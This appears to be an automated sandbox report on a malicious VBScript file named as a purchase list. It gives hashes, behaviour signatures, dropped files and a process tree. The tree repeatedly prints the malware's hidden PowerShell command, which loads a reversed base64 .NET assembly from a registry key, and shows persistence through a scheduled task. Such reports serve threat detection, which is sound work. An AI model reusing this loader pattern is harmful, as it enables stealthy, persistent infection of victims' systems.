Analysis

  • max time kernel
    143s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    28/02/2025, 11:02

General

  • Target

    purchase list #8479734734-8843947347_____________________________.vbe

  • Size

    24KB

  • MD5

    5aea1615d1872e876da66200bc9e47fa

  • SHA1

    6fe3576517885705735762ff060e9068fd9fdbe9

  • SHA256

    c9a42d3cb9f1ff79d28112275dd9d598daa429c81912c171401fce5594f1f515

  • SHA512

    68a87c1bbbf107714634af224b46a02252c8fd7e3799dee8fa36e4e064be07f2e51e4fab20591d7e6e05de769a4aac7ae59ef3b70e95cd3b6cec77d028a05ccd

  • SSDEEP

    192:Lh1qAagTqDNmlc1sN+uc4f9caUxarPlP1K:qMqDAlnoP4VcaUxarK

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

    Run Powershell and hide display window.

  • Drops file in System32 directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\purchase list #8479734734-8843947347_____________________________.vbe"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2548
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2836
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {931EDB12-B402-428E-9EB5-C26F6A66D6E8} S-1-5-21-2872745919-2748461613-2989606286-1000:CCJBVTGQ\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2668
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\NforSjIryOoBaoP.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2000
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:564
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1804
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2920
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2160
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:920
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1780
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2100
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1608
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1868
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\NforSjIryOoBaoP' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('NforSjIryOoBaoP')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2892

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\80LSVT8G81JI6CDALJ6M.temp

    Filesize

    7KB

    MD5

    e98f52c319ce9669bd2771bc02edecdb

    SHA1

    e96eb0a66646cce86cab807782d9040944d549c9

    SHA256

    481c7365a7ab1811505873a7f746c4c460ada3d671a2a540aad1d76685d18ec8

    SHA512

    79dad58cc64ae84a8efdbce8bb5d58f43c82ac2d9a26b14cb9e76ab57e4df128200147c8a4680410c14bc360406b04f2d53f10162970a92f0b65d13631e6787a

  • C:\Users\Admin\AppData\Roaming\NforSjIryOoBaoP.vbs

    Filesize

    2KB

    MD5

    361b0dd2b7993fe7d36caa709dfa9438

    SHA1

    ffd8de4adc4f2850d5b0ae4af21dd2fbd0a75d8d

    SHA256

    ce725c50b0c8b66e12fc51e3673869d069160278a05ac5c4e8c2d278551cf78f

    SHA512

    70537e86d38b45782c6db967bc963c2f09c1fec2c217f58dec21b3e4ea18f1fbf35ed5519a0f3eaf82d87f69ce5bc2c901361fae297d1c0a6bb7ca161d0355a3

  • memory/2836-11-0x000007FEF5870000-0x000007FEF620D000-memory.dmp

    Filesize

    9.6MB

  • memory/2836-8-0x000007FEF5870000-0x000007FEF620D000-memory.dmp

    Filesize

    9.6MB

  • memory/2836-10-0x0000000002E70000-0x0000000002E7A000-memory.dmp

    Filesize

    40KB

  • memory/2836-5-0x000007FEF5B2E000-0x000007FEF5B2F000-memory.dmp

    Filesize

    4KB

  • memory/2836-12-0x000007FEF5870000-0x000007FEF620D000-memory.dmp

    Filesize

    9.6MB

  • memory/2836-13-0x000007FEF5870000-0x000007FEF620D000-memory.dmp

    Filesize

    9.6MB

  • memory/2836-14-0x000007FEF5B2E000-0x000007FEF5B2F000-memory.dmp

    Filesize

    4KB

  • memory/2836-15-0x000007FEF5870000-0x000007FEF620D000-memory.dmp

    Filesize

    9.6MB

  • memory/2836-9-0x000007FEF5870000-0x000007FEF620D000-memory.dmp

    Filesize

    9.6MB

  • memory/2836-7-0x0000000002860000-0x0000000002868000-memory.dmp

    Filesize

    32KB

  • memory/2836-6-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

    Filesize

    2.9MB